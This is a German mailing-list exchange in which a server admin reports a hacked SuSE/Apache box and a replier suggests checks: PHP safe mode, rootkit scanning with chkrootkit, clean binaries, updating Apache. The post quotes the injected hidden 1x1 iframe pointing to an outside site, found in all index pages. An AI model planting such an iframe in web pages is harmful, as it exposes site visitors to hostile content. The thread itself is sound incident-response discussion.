Tol wrote:
Hallo Liste!
Ich bräuchte mal eure Hilfe! Ich glaube mein Server ist gehacked!! *peinlich*peinlich* :-( Aber ich bin mir noch nicht ganz sicher, in welchem Umfang und was am Sinnigsten nun zu tun ist. Vielleicht habt ihr ja die ein oder andere Hilfestellung für mich?
Meiner ist auch schonmal gehackt worden ... kommt vor ;-)
Also: Gemerkt hab ich es daran, dass sämtliche index.* Seiten hinter dem Body Tag einen neuen iframe Eintrag haben:
<IFRAME SRC="http://www.forced-action.com/" WIDTH=1 HEIGHT=1></IFRAME>
Pfui!
Und der kommt garantiert nicht von mir!!
Mein erster Gedanke war, sofort alles "platt" und neu machen! Aber muß das wirklich sein?
Nein, ... solange wirklich nur die index.* Seiten modifziert wurden ...
Kann ich davon ausgehen, dass man nur mit root Zugriff, alle diese Dateien (unterschiedliche user!) ändern kann? Also, ist es zwingend, dass das root-passwort geknackt sein muß? Oder gibt es andere Möglichkeiten. Ich denke da an überlange Parameter ... oder schlechte CGIs (von denen gar keine im Einsatz sind, wenn ich mich nicht irre!)
Das System ist ein Suse 7.1. Apache ist in der version 1.3.24 installiert. Telnet ist deaktiviert, Zugang gibt es nur mittels SSH.
Ist PHP installiert? Ist der Safe-Mode aktiviert? Ist vielleicht ein Perl Script falsch konfiguriert? Welche Version hat der SSH-Server? Welche anderen Dienste laufen auf dem Rechner? Schonmal einene Portscan auf Deiner Maschine gemacht? Wäre dies nicht der geeignete Zeitpunkt um ein Update auf eine aktuelle Version zu machen? Sicherlich, wenn dieses 7.1er Release ordenlich gepflegt ist muss es ja nicht sein, dass die Versionen der einzelnen Applikationen "löchrig" sind, aber gerade Apache hat schon einige sicherheitsrelevante Updates erfahren seit 1.3.24 ( http://www.apacheweek.com/features/security-13 ). Wenn das vielleicht im moment gerade schlecht ist, dann könntest Du mit chkrootkit überprüfen ob ein bekanntes Rootkit installiert ist ( http://www.chkrootkit.org ). Ralf Spenneberg hat einen sehr guten Artikel in seinem Buch "Intrusion Detection für Linux Server" geschrieben ( http://www.spenneberg.com/public/IDS-Book/chapter16.pdf ) beachte insbesonders, dass Du die wichtigsten Systembinaries auf einem saubenen Datenträger zur Verfügung stellst. Beachte dazu bitte auch diesen Thread ( http://lists.suse.com/archive/suse-linux/2003-Oct/3970.html ).
Was wäre nun am besten zu tun? tripwire im Nachhinein zu installieren ist mit Sicherheit quark! Das hab ich verpaßt! Aber gibt es noch andere Möglichkeiten, um was rauszubekommen oder zu verschließen??
Freue mich über jede Hilfe!
Viele Grüße Tol
Grüße Sascha